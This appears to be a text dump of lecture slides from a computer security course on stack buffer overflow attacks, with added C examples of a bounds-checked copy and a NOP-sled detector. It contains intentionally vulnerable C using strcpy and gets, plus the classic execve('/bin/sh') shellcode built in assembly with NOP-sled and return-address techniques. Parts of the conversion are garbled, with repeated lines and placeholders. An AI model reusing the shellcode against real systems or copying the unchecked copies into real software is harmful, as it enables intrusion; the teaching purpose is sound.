Buffer Overflow Attacks
Basic Idea | Sample Attacks | Protection
6.857, Computer & Network Security
History
1960s: Vulnerability exploited on time-share machines
1970s: Attacks on early networked machines
1980s: Morris Worm uses buffer overflow in taking down significant portion of the Internet
1990s: Buffer overflow attacks become (arguably) the most pressing security concerns facing the web (e.g., in 1998, 2/3 of CERT advisories were buffer overflow related)
Today: The problem persists (e.g., IE VML advisory from two months ago).
Memory Layout
Text
Data
Heap
Stack
High Addresses
Low Addresses
```c
void func(int a, int b) {
    char buffer[10];
}

int main(void) {
    func(1, 2);
    return 0;
}
```

```asm
pushl $2
pushl $1
call func
…
pushl %ebp
movl %esp, %ebp
subl $24, %esp
```

Stack labels, in the order the slides add them: sp, fp, 2, 1, ret, sfp, buffer

```c
void func(int a, int b) {
    char buffer[10];
    strcpy(buffer, bigstr);   /* no bounds check on the copy */
}
```

Stack labels: sp, fp, 2, 1, ret, sfp, buffer; the next slide shows bigstr in place of buffer.
Sample Attacks
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
Modify Local Variables
```c
#include <stdlib.h>
#include <string.h>

void handleRequest() {
    int code;
    char subject[] = "[[[SECRET]]] user request";
    char recp[] = "[email protected]";
    char query[8];
    strcpy(query, getenv("QUERY_STRING"));   /* unbounded copy into an 8-byte buffer */
    //send top secret e-mail to recp
    …
}
```

Stack labels: ret, sfp, subject[], recp[], query
Demo…
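
The slide's unchecked copy next to a length-checked one, as an added example (not code from the lecture): the frame is modelled as one flat byte array so the overwrite of recp can be observed without undefined behaviour. The layout offsets, the helper names and the example.test addresses are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the handleRequest() frame: query[8] sits directly
 * below recp[] in one flat byte array, so a write past query stays inside
 * the array and its effect is observable. Offsets and the recipient value
 * are assumptions, not taken from the slides. */
enum { QUERY_OFF = 0, QUERY_LEN = 8, RECP_OFF = 8, RECP_LEN = 24,
       FRAME_LEN = QUERY_LEN + RECP_LEN };

struct frame { char bytes[FRAME_LEN]; };

void frame_init(struct frame *f)
{
    memset(f->bytes, 0, FRAME_LEN);
    strcpy(f->bytes + RECP_OFF, "admin@example.test");   /* placeholder recipient */
}

const char *frame_query(const struct frame *f) { return f->bytes + QUERY_OFF; }
const char *frame_recp(const struct frame *f)  { return f->bytes + RECP_OFF; }

/* Models strcpy(query, src): copies the string and its NUL with no regard
 * for QUERY_LEN. Returns how many bytes landed beyond query (0 if none).
 * The clamp to FRAME_LEN exists only to keep the model itself in bounds. */
size_t copy_unchecked(struct frame *f, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > FRAME_LEN) n = FRAME_LEN;
    memcpy(f->bytes + QUERY_OFF, src, n);
    f->bytes[FRAME_LEN - 1] = '\0';
    return n > QUERY_LEN ? n - QUERY_LEN : 0;
}

/* Hardened form: measure first, reject anything that does not fit together
 * with its terminator, and leave the frame untouched on rejection. */
int copy_checked(struct frame *f, const char *src)
{
    if (src == NULL) return -1;            /* getenv() may return NULL */
    size_t n = strlen(src);
    if (n >= QUERY_LEN) return -1;         /* 8 characters would need 9 bytes */
    memcpy(f->bytes + QUERY_OFF, src, n + 1);
    return 0;
}

int main(void)
{
    const char *long_input = "AAAAAAAAother@example.test";  /* constructed input */
    struct frame f;

    frame_init(&f);
    size_t spill = copy_unchecked(&f, long_input);
    printf("unchecked: %zu bytes past query, recp=\"%s\"\n", spill, frame_recp(&f));

    frame_init(&f);
    int rc = copy_checked(&f, long_input);
    printf("checked:   rc=%d, recp=\"%s\"\n", rc, frame_recp(&f));
    return 0;
}
```
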
Repeat Code…
```c
#include <stdio.h>

void func(int a, int b){
    printf("Inside func loop.\n");
    char buffer[4];
    gets(buffer);   /* reads a line with no length limit */
}

int main(){
    printf("about to call func.\n");
    func(5,6);
    printf("done.\n");
}
```

Stack labels: b, a, ret, sfp, buffer; later slides show addr in place of buffer.
Demo…
Running Evil Code…
```c
void func(int a, int b) {
    char buffer[32];
    gets(buffer);   /* reads a line with no length limit */
    …
}
```

Stack labels: 2, 1, ret, sfp, buffer
Later slides show 2, 1 and, in place of ret, sfp and buffer, the labels: evil code (repeated 4 times), nop (repeated 11 times), 0x80483eb
????

```c
#include <unistd.h>

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
```

```asm
movl $0x80884a8,0xfffffff8(%ebp)
movl $0x0,0xfffffffc(%ebp)
push $0x0
lea 0xfffffff8(%ebp),%eax
push %eax
pushl 0xfffffff8(%ebp)
call 0x804d880 <execve>
```

Stack labels: 0xffffffff; name; 0xfffffff8: 0x80884a8 (“/bin/sh”); 0xfffffffc: NULL; pushed values NULL, 0xfffffff8, 0x80884a8; ret, sfp, fp (ebp)

```asm
mov 0x8(%ebp),%ebx
mov 0xc(%ebp),%ecx
mov 0x10(%ebp),%edx
mov $0xb,%eax
int $0x80
```

Register labels: ebx = 0x80884a8, ecx = 0xfffffff8, edx = NULL

```asm
movl string_addr,0x8
movl $0x0,0xc
movl $0xb,%eax
movl string_addr,%ebx
leal 0x8,%ecx
movl 0xc,%edx
int $0x80
```

Diagram labels: ret, sfp, fp (ebp); string_addr, NULL, 0x8; ebx, ecx, edx
??????
![Page 53: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/53.jpg)
Running Evil Code…
53
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
![Page 54: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/54.jpg)
Running Evil Code…
54
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
![Page 56: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/56.jpg)
Running Evil Code…
ret
sfp
“/bin/sh”
code
addr of “/bin/sh”
![Page 57: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/57.jpg)
Running Evil Code…
ret
sfp
“/bin/sh”
code
addr of “/bin/sh”
esi
![Page 59: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/59.jpg)
Running Evil Code…
ret
sfp
Obstacle #1: Zero Bytes
![Page 60: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/60.jpg)
Running Evil Code…
ret
sfp
Obstacle #1: Zero Bytes
Solution: Generate on the fly (e.g., push $0x0 = xor %eax, %eax; push %eax)
![Page 61: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/61.jpg)
Running Evil Code…
ret
sfp
Obstacle #2: Guessing the Return Address
code
ret’ ret’ ret’ ret’ ret’ ret’
![Page 64: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/64.jpg)
Running Evil Code…
ret
sfp
Obstacle #2: Guessing the Return Address
Solution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ ret’ ret’ ret’ ret’ ret’
nop nop nop
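Seen from the defender's side, the layout on this slide (NOP pad, code, repeated guessed return address) is also a signature that network and host sensors can look for. The C sketch below is an added example, not part of the lecture; the function names, thresholds and sample bytes (0xCC filler, the word 0x41 0x42 0x43 0x44) are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Longest run of the one-byte x86 NOP opcode (0x90) in buf. */
size_t longest_nop_run(const uint8_t *buf, size_t len) {
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Count of identical 4-byte words ending the buffer: the repeated
 * guessed return address (ret' ret' ret' ...) from the slide. */
size_t trailing_word_repeats(const uint8_t *buf, size_t len) {
    if (len < 4) return 0;
    const uint8_t *last = buf + len - 4;
    size_t n = 1;
    while ((n + 1) * 4 <= len && memcmp(last - n * 4, last, 4) == 0)
        n++;
    return n;
}

/* Flag input that has both features; thresholds are assumed tuning knobs. */
int looks_like_sled_payload(const uint8_t *buf, size_t len,
                            size_t min_nops, size_t min_repeats) {
    return longest_nop_run(buf, len) >= min_nops &&
           trailing_word_repeats(buf, len) >= min_repeats;
}

/* Constructed sample in the slide's layout: 32 NOPs, 16 filler bytes
 * (0xCC) standing in for "code", then 6 copies of a placeholder word. */
size_t build_constructed_sample(uint8_t *out, size_t cap) {
    static const uint8_t word[4] = {0x41, 0x42, 0x43, 0x44};
    if (cap < 72) return 0;
    memset(out, 0x90, 32);
    memset(out + 32, 0xCC, 16);
    for (size_t i = 0; i < 6; i++) memcpy(out + 48 + 4 * i, word, 4);
    return 72;
}

int main(void) {
    uint8_t s[72];
    size_t n = build_constructed_sample(s, sizeof s);
    return looks_like_sled_payload(s, n, 16, 4) ? 0 : 1;
}
```

A run of 0x90 bytes is only one heuristic, so treat a hit as a signal to correlate with other evidence rather than a verdict.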